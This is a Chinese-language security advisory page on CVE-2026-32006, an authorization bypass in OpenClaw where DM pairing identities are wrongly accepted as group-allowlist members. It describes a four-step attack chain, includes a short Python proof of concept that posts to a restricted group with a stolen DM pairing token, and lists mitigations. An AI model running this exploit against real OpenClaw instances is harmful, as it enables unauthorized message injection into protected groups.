IPBUF安全漏洞报告
English
CVE-2026-32006 CVSS 3.1 低危

CVE-2026-32006 OpenClaw授权绕过漏洞

披露日期: 2026-03-19

漏洞信息

漏洞编号
CVE-2026-32006
漏洞类型
授权绕过
CVSS评分
3.1 低危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

授权绕过OpenClaw逻辑漏洞权限提升

漏洞概述

OpenClaw在2026.2.26之前的版本中存在授权绕过漏洞。当系统配置为dmPolicy=pairing且groupPolicy=allowlist时,程序错误地将DM配对存储身份视为组白名单身份。这导致远程攻击者可以在未获得显式groupAllowFrom成员资格的情况下,利用DM配对身份发送消息和反应,从而成功绕过组发送者的授权检查。

技术细节

该漏洞的核心在于OpenClaw的身份校验逻辑错误。当启用直接消息配对策略(dmPolicy=pairing)和组白名单策略(groupPolicy=allowlist)时,应用在验证用户是否有权向特定组发送消息时,未严格区分“DM配对身份”与“组白名单成员”。受影响的代码逻辑在检查权限时发生了回退,即如果用户不在组白名单中,系统错误地依据DM配对存储中的身份通过验证。这使得仅拥有DM配对权限的攻击者能够越过组的隔离机制,向受保护的组发送消息或表情,破坏了系统的访问控制完整性。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标OpenClaw实例,并确认其配置了dmPolicy=pairing和groupPolicy=allowlist。
STEP 2
2. 身份获取
攻击者通过某种方式获取受害者的DM配对身份令牌或建立与受害者的DM配对连接。
STEP 3
3. 权限绕过
攻击者利用该DM配对令牌,向目标用户所在的组发送消息或反应。
STEP 4
4. 未授权操作
由于系统错误地将DM身份视为白名单身份,消息被成功发送,实现了未授权的信息注入。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit for CVE-2026-32006: OpenClaw Authorization Bypass # Description: Send a message to a restricted group using DM pairing identity. # Target requires dmPolicy=pairing and groupPolicy=allowlist. target_url = "https://example-openclaw-instance/api/v1/groups/{group_id}/messages" dm_token = "STOLEN_OR_OBTAINED_DM_PAIRING_TOKEN" headers = { "Authorization": f"Bearer {dm_token}", "Content-Type": "application/json" } payload = { "content": "This message was sent bypassing group allowlist checks using CVE-2026-32006." } try: # Attempt to send message to a group the user is not explicitly whitelisted in response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Message sent to group.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

影响范围

OpenClaw < 2026.2.26

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用dmPolicy=pairing模式,或将groupPolicy更改为非白名单模式,以阻断该漏洞的利用路径。同时,应监控异常的组消息发送行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表